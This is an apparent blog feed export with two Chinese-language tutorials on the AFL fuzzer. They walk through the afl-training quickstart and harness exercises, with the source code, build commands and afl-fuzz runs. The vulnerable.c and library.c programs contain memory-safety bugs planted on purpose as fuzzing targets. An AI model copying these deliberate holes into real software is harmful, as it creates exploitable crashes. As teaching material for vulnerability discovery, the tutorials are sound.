class="hljs-type">char</span> *out;<br> <span class="hljs-type">char</span> *rest;<br> <span class="hljs-type">int</span> len;<br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"u "</span>, <span class="hljs-number">2</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// upper case command</span><br> <span class="hljs-type">char</span> *rest;<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">2</span>, &rest, <span class="hljs-number">10</span>); <span class="hljs-comment">// how many characters of the string to upper-case</span><br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> out = <span class="hljs-built_in">malloc</span>(len + <span class="hljs-built_in">strlen</span>(input)); <span class="hljs-comment">// could be shorter, but play it safe</span><br> <span class="hljs-keyword">if</span> (len > (<span class="hljs-type">int</span>)<span class="hljs-built_in">strlen</span>(input))<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Specified length %d was larger than the input!\n"</span>, len);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (out == <span class="hljs-literal">NULL</span>)<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to allocate memory\n"</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i != len; i++)<br> {<br> out[i] = rest[i] - <span class="hljs-number">32</span>; <span class="hljs-comment">// only handles ASCII</span><br> }<br> out[len] = <span class="hljs-number">0</span>;<br> <span class="hljs-built_in">strcat</span>(out, rest + len); <span class="hljs-comment">// append the remaining text</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>, out);<br> <span class="hljs-built_in">free</span>(out);<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"head "</span>, <span class="hljs-number">5</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// head command</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strlen</span>(input) > <span class="hljs-number">6</span>)<br> {<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">4</span>, &rest, <span class="hljs-number">10</span>);<br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> rest[len] = <span class="hljs-string">'\0'</span>; <span class="hljs-comment">// truncate string at specified offset</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, rest);<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"head input was too small\n"</span>);<br> }<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(input, <span class="hljs-string">"surprise!\n"</span>) == <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-comment">// easter egg!</span><br> *(<span class="hljs-type">char</span> *)<span class="hljs-number">1</span> = <span class="hljs-number">2</span>;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> *argv[])</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *usage = <span class="hljs-string">"Usage: %s\n"</span><br> <span class="hljs-string">"Text utility - accepts commands and data on stdin and prints results to stdout.\n"</span><br> <span class="hljs-string">"\tInput | Output\n"</span><br> <span class="hljs-string">"\t------------------+-----------------------\n"</span><br> <span class="hljs-string">"\tu <N> <string> | Uppercased version of the first <N> bytes of <string>.\n"</span><br> <span class="hljs-string">"\thead <N> <string> | The first <N> bytes of <string>.\n"</span>;<br> <span class="hljs-type">char</span> input[INPUTSIZE] = {<span class="hljs-number">0</span>};<br><br> <span class="hljs-comment">// Slurp input</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">read</span>(STDIN_FILENO, input, INPUTSIZE) < <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"Couldn't read stdin.\n"</span>);<br> }<br><br> <span class="hljs-type">int</span> ret = <span class="hljs-built_in">process</span>(input);<br> <span class="hljs-keyword">if</span> (ret)<br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, usage, argv[<span class="hljs-number">0</span>]);<br> };<br> <span class="hljs-keyword">return</span> ret;<br>}<br></code></pre></td></tr></table></figure><p>基本功能:</p><p>u :对字符串的前n个字节变成大写字符串;<br>head :截取字符串的前n个字符;<br>surprise!:隐藏功能,直接触发崩溃。<br>运行afl-fuzz对程序进行测试:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">afl-fuzz -i inputs -o output ./vulnerable<br></code></pre></td></tr></table></figure><p>inputs目录是输入的种子目录,由用户提供,应该是精心准备的样本以有效提高fuzz效率,可以看到项目提供的inputs目录中包含触发u和head的样例:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>ls inputs/<br>head u<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/head <br>head <span class="hljs-number">20</span> <span class="hljs-title class_">This</span> string is going to be truncated at the <span class="hljs-number">20</span>th position.<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat inputs/u<br>u <span class="hljs-number">4</span> capsme<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span>$<br></code></pre></td></tr></table></figure><p>fuzz结果:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142124159.png" alt="image-20240114212413941"></p><p><code>out</code>有相应的产出,其中<code>crashes</code>目录存储的是崩溃样本;<code>queue</code>目录存储的是成果触发新路径的样本即有趣的样本(即新路径)。</p><p>查看output当中的crashes并运行查看效果</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142127219.png" alt="image-20240114212726170"></p><p>通过这个小的<code>demo</code>来体验<code>afl fuzz</code>的过程,对<code>afl</code>有了初步的了解。</p><h1 id="harness"><a href="#harness" class="headerlink" title="harness"></a>harness</h1><p>harness的作用是通过demo来体验如何针对具体的库代码来编写测试框架。</p><p>这个项目当中的流程演示图:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142130722.png" alt="image-20240114213011640"></p><p>研究测试人员创建输入目录并提供变异的语料库(input corpus);针对测试代码编写测试框架(write harness),经过afl-clang-fast/afl-gcc插桩编译后产生支持反馈模糊测试的二进制程序;afl-fuzz从队列(queue)中挑选种子进行变异;变异后的样本扔给测试框架(harness)运行并监控运行结果;如果崩溃,则存储到崩溃目录中(crashes);如果样本成功触发了新路径,则将它添加到队列(queue)当中。</p><p>本次实验是通过编写代码对library库进行测试</p><p>library.h:</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">#<span class="hljs-keyword">include</span> <unistd.h><br><span class="hljs-comment">// an 'nprintf' implementation - print the first len bytes of data</span><br>void lib<span class="hljs-constructor">_echo(<span class="hljs-params">char</span> <span class="hljs-operator">*</span><span class="hljs-params">data</span>, <span class="hljs-params">ssize_t</span> <span class="hljs-params">len</span>)</span>;<br><br><span class="hljs-comment">// optimised multiply - returns x*y</span><br><span class="hljs-built_in">int</span> lib<span class="hljs-constructor">_mul(<span class="hljs-params">int</span> <span class="hljs-params">x</span>, <span class="hljs-params">int</span> <span class="hljs-params">y</span>)</span>;<br></code></pre></td></tr></table></figure><p>library.c:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><assert.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">"library.h"</span></span><br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">lib_echo</span><span class="hljs-params">(<span class="hljs-type">char</span> *data, <span class="hljs-type">ssize_t</span> len)</span></span>{<br><span class="hljs-keyword">if</span>(<span class="hljs-built_in">strlen</span>(data) == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span>;<br>}<br><span class="hljs-type">char</span> *buf = <span class="hljs-built_in">calloc</span>(<span class="hljs-number">1</span>, len);<br><span class="hljs-built_in">strncpy</span>(buf, data, len);<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>,buf);<br><span class="hljs-built_in">free</span>(buf);<br><br><span class="hljs-comment">// A crash so we can tell the harness is working for lib_echo</span><br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">0</span>] == <span class="hljs-string">'p'</span>) {<br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">1</span>] == <span class="hljs-string">'o'</span>) {<br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">2</span>] ==<span class="hljs-string">'p'</span>) {<br><span class="hljs-keyword">if</span>(data[<span class="hljs-number">3</span>] == <span class="hljs-string">'!'</span>) {<br><span class="hljs-built_in">assert</span>(<span class="hljs-number">0</span>);<br>}<br>}<br>}<br>}<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">lib_mul</span><span class="hljs-params">(<span class="hljs-type">int</span> x, <span class="hljs-type">int</span> y)</span></span>{<br><span class="hljs-keyword">if</span>(x%<span class="hljs-number">2</span> == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> y << x;<br>} <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (y%<span class="hljs-number">2</span> == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> x << y;<br>} <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (x == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>} <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (y == <span class="hljs-number">0</span>) {<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>} <span class="hljs-keyword">else</span> {<br><span class="hljs-keyword">return</span> x * y;<br>}<br>}<br></code></pre></td></tr></table></figure><p>本次实验是通过编写代码对这两个函数进行fuzz</p><p>两个函数的功能</p><ul><li>lib_echo:输出参数data中的前len个字符串;</li><li>lib_mul:输出参数x乘以y的值。</li></ul><p>为了实现目的,编写的程序必须具有一下功能:</p><ul><li><p>编译出来的程序必须是可执行的,即需要一个main函数,从而被编译成可执行的二进制程序;</p></li><li><p>具备反馈信息的能力以使afl更高效的fuzz,即编写出来的代码需要使用afl-clang-fast或afl-clang或afl-gcc进行插桩编译;</p></li><li><p>提供数据接口以供afl进行变异;即两个函数使用的参数数据应来自于标准输入或文件,使得afl可以很方便的变异。</p></li></ul><p>最终编写出如下代码:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">"library.h"</span></span><br><br><span class="hljs-comment">// fixed size buffer based on assumptions about the maximum size that is likely necessary to exercise all aspects of the target function</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> SIZE 100</span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span>* argv[])</span> {<br> <span class="hljs-keyword">if</span>((argc == <span class="hljs-number">2</span>) && <span class="hljs-built_in">strcmp</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">"echo"</span>) == <span class="hljs-number">0</span>) {<br> <span class="hljs-comment">// make sure buffer is initialized to eliminate variable behaviour that isn't dependent on the input.</span><br> <span class="hljs-type">char</span> input[SIZE] = {<span class="hljs-number">0</span>};<br><br> <span class="hljs-type">ssize_t</span> length;<br> length = read(STDIN_FILENO, input, SIZE);<br><br> lib_echo(input, length);<br> } <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> ((argc == <span class="hljs-number">2</span>) && <span class="hljs-built_in">strcmp</span>(argv[<span class="hljs-number">1</span>], <span class="hljs-string">"mul"</span>) == <span class="hljs-number">0</span>) {<br> <span class="hljs-type">int</span> a,b = <span class="hljs-number">0</span>;<br> read(STDIN_FILENO, &a, <span class="hljs-number">4</span>);<br> read(STDIN_FILENO, &b, <span class="hljs-number">4</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%d\n"</span>, lib_mul(a,b));<br> } <span class="hljs-keyword">else</span> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Usage: %s mul|echo\n"</span>, argv[<span class="hljs-number">0</span>]);<br> }<br>}<br></code></pre></td></tr></table></figure><p>可以看到main函数当中由命令行参数决定是对libc_echo函数进行测试还是对libc_mul进行模糊测试;接着由标准输入作为参数对函数进行调用;最后由afl-clang-fast对程序进行插桩编译</p><p>编译的命令是:</p><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">AFL_HARDEN<span class="hljs-operator">=</span><span class="hljs-number">1</span> afl-clang-<span class="hljs-keyword">fast</span> harness.<span class="hljs-keyword">c</span> library.<span class="hljs-keyword">c</span> -o harness<br></code></pre></td></tr></table></figure><p>接下来先对libc_echo库函数进行模糊测试:</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>rm -rf input_echo/<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>mkdir input_echo<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>echo aaaa > input_echo/seed<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>afl-fuzz -i input_echo/ -o output_echo ./harness echo<br></code></pre></td></tr></table></figure><p>没过多久就fuzz出了crashes:</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142159636.png" alt="image-20240114215948496"></p><p>接着对libc_mul进行模糊测试</p><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs elixir">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>mkdir input_mul<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>echo <span class="hljs-string">"1 3 "</span> > input_mul/seed<br>youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/harness</span><span class="hljs-variable">$ </span>afl-fuzz -i input_mul -o output_mul ./harness mul<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401142235223.png" alt="image-20240114223558136"></p><p>通过这个<code>demo</code>可以理解在对特定的目标进行模糊测试时,如何基于<code>afl</code>编写优化框架来对代码进行模糊测试。</p>]]></content>
</entry>
<entry>
<title>初探afl-fuzz</title>
<link href="/2024/01/13/%E5%88%9D%E6%8E%A2afl-fuzz/"/>
<url>/2024/01/13/%E5%88%9D%E6%8E%A2afl-fuzz/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>早就想开始学习fuzz了,结果拖了得有半年了。一方面是源码的阅读能力太弱,另一方面可能还是对于学习投入的精力不太够吧。甚至期间九哥还请hollk师傅做过一次fuzz的讲解,可惜当时学习了一下基本用法之后就没有再进行深入的学习了。</p><p>本篇文章主要还是讲解afl-fuzz的一个基本用法</p><p>参考文章:</p><p><a href="https://xz.aliyun.com/t/4314?time__1311=n4+xnD0D9DgDcBQKDtD/ia4BKmqE=WDI2hhrrD&alichlgref=https://www.google.com/">https://xz.aliyun.com/t/4314?time__1311=n4%2BxnD0D9DgDcBQKDtD%2Fia4BKmqE%3DWDI2hhrrD&alichlgref=https%3A%2F%2Fwww.google.com%2F</a></p><p><a href="https://tttang.com/archive/1508/">https://tttang.com/archive/1508/</a></p><h1 id="AFL-Fuzz介绍"><a href="#AFL-Fuzz介绍" class="headerlink" title="AFL-Fuzz介绍"></a>AFL-Fuzz介绍</h1><p>Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。</p><p>AFL则是fuzzing的一个很好用的工具,全称是American Fuzzy Lop,由Google安全工程师Michał Zalewski开发的一款开源fuzzing测试工具,可以高效地对二进制程序进行fuzzing,挖掘可能存在的内存安全漏洞,如栈溢出、堆溢出、UAF、double free等。由于需要在相关代码处插桩,因此AFL主要用于对开源软件进行测试。当然配合QEMU等工具,也可对闭源二进制代码进行fuzzing,但执行效率会受到影响</p><p>工作原理:</p><p>通过对源码进行重新编译时进行插桩(简称编译时插桩)的方式自动产生测试用例来探索二进制程序内部新的执行路径。AFL也支持直接对没有源码的二进制程序进行测试,但需要QEMU的支持。</p><h1 id="AFL界面介绍"><a href="#AFL界面介绍" class="headerlink" title="AFL界面介绍"></a>AFL界面介绍</h1><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130050565.png" alt="image-20240113005059484"></p><h2 id="process-timing"><a href="#process-timing" class="headerlink" title="process timing"></a>process timing</h2><p>这里展示了当前fuzzer的运行时间、最近一次发现新执行路径的时间、最近一次崩溃的时间、最近一次超时的时间。</p><p>值得注意的是第2项,最近一次发现新路径的时间。如果由于目标二进制文件或者命令行参数出错,那么其执行路径应该是一直不变的,所以如果从fuzzing开始一直没有发现新的执行路径,那么就要考虑是否有二进制或者命令行参数错误的问题了。对于此状况,AFL也会智能地进行提醒</p><h2 id="overall-results"><a href="#overall-results" class="headerlink" title="overall results"></a>overall results</h2><p>这里包括运行的总周期数、总路径数、崩溃次数、超时次数。</p><p>其中,总周期数可以用来作为何时停止fuzzing的参考。随着不断地fuzzing,周期数会不断增大,其颜色也会由洋红色,逐步变为黄色、蓝色、绿色。一般来说,当其变为绿色时,代表可执行的内容已经很少了,继续fuzzing下去也不会有什么新的发现了。此时,我们便可以通过Ctrl-C,中止当前的fuzzing</p><h2 id="stage-progress"><a href="#stage-progress" class="headerlink" title="stage progress"></a>stage progress</h2><p>这里包括正在测试的fuzzing策略、进度、目标的执行总次数、目标的执行速度</p><p>执行速度可以直观地反映当前跑的快不快,如果速度过慢,比如低于500次每秒,那么测试时间就会变得非常漫长。如果发生了这种情况,那么我们需要进一步调整优化我们的fuzzing</p><p>以上是简单的介绍,如果要看完整的可以查看<a href="http://lcamtuf.coredump.cx/afl/status_screen.txt">官方的文档</a></p><h1 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h1><p>先进入官网进行源码下载:<a href="https://gitcode.com/mirrors/google/afl/overview">https://gitcode.com/mirrors/google/afl/overview</a></p><p>进行编译,以及后续的源码阅读</p><figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs gauss"><span class="hljs-built_in">make</span><br>sudo <span class="hljs-built_in">make</span> install<br></code></pre></td></tr></table></figure><p>输入以上命令后基本就能安装成功了,在终端输入afl-后tab,就能出现以下这些命令了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401130044559.png" alt="image-20240113004432472"></p><h1 id="使用AFL插桩程序(有源码)"><a href="#使用AFL插桩程序(有源码)" class="headerlink" title="使用AFL插桩程序(有源码)"></a>使用AFL插桩程序(有源码)</h1><p>选择的是<a href="https://github.com/mykter/afl-training">afl-training</a>当中的<a href="https://github.com/mykter/afl-training/tree/main/quickstart">quickstart</a></p><p><code>quickstart</code>通过<code>fuzz</code>一个简单的<code>demo</code>来体验<code>afl</code>的使用过程。</p><p>编译<code>demo</code>的方法是:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd quickstart<br><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">AFL_HARDEN</span>=1 make<br></code></pre></td></tr></table></figure><p>make默认会编译all,all编译的是vulnerable,所以最终会形成afl-clang-fast -g -w vulnerable.c -o vulnerable。</p><p><code>vulnerable.c</code>代码如下所示:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><code class="hljs cpp">$ cat vulnerable.c<br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> INPUTSIZE 100</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">process</span><span class="hljs-params">(<span class="hljs-type">char</span> *input)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-type">char</span> *out;<br> <span class="hljs-type">char</span> *rest;<br> <span class="hljs-type">int</span> len;<br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"u "</span>, <span class="hljs-number">2</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// upper case command</span><br> <span class="hljs-type">char</span> *rest;<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">2</span>, &rest, <span class="hljs-number">10</span>); <span class="hljs-comment">// how many characters of the string to upper-case</span><br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> out = <span class="hljs-built_in">malloc</span>(len + <span class="hljs-built_in">strlen</span>(input)); <span class="hljs-comment">// could be shorter, but play it safe</span><br> <span class="hljs-keyword">if</span> (len > (<span class="hljs-type">int</span>)<span class="hljs-built_in">strlen</span>(input))<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Specified length %d was larger than the input!\n"</span>, len);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (out == <span class="hljs-literal">NULL</span>)<br> {<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Failed to allocate memory\n"</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br> }<br> <span class="hljs-keyword">for</span> (<span class="hljs-type">int</span> i = <span class="hljs-number">0</span>; i != len; i++)<br> {<br> out[i] = rest[i] - <span class="hljs-number">32</span>; <span class="hljs-comment">// only handles ASCII</span><br> }<br> out[len] = <span class="hljs-number">0</span>;<br> <span class="hljs-built_in">strcat</span>(out, rest + len); <span class="hljs-comment">// append the remaining text</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>, out);<br> <span class="hljs-built_in">free</span>(out);<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strncmp</span>(input, <span class="hljs-string">"head "</span>, <span class="hljs-number">5</span>) == <span class="hljs-number">0</span>)<br> { <span class="hljs-comment">// head command</span><br> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strlen</span>(input) > <span class="hljs-number">6</span>)<br> {<br> len = <span class="hljs-built_in">strtol</span>(input + <span class="hljs-number">4</span>, &rest, <span class="hljs-number">10</span>);<br> rest += <span class="hljs-number">1</span>; <span class="hljs-comment">// skip the first char (should be a space)</span><br> rest[len] = <span class="hljs-string">'\0'</span>; <span class="hljs-comment">// truncate string at specified offset</span><br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s\n"</span>, rest);<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"head input was too small\n"</span>);<br> }<br> }<br> <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(input, <span class="hljs-string">"surprise!\n"</span>) == <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-comment">// easter egg!</span><br> *(<span class="hljs-type">char</span> *)<span class="hljs-number">1</span> = <span class="hljs-number">2</span>;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> <span class="hljs-keyword">return</span> <span 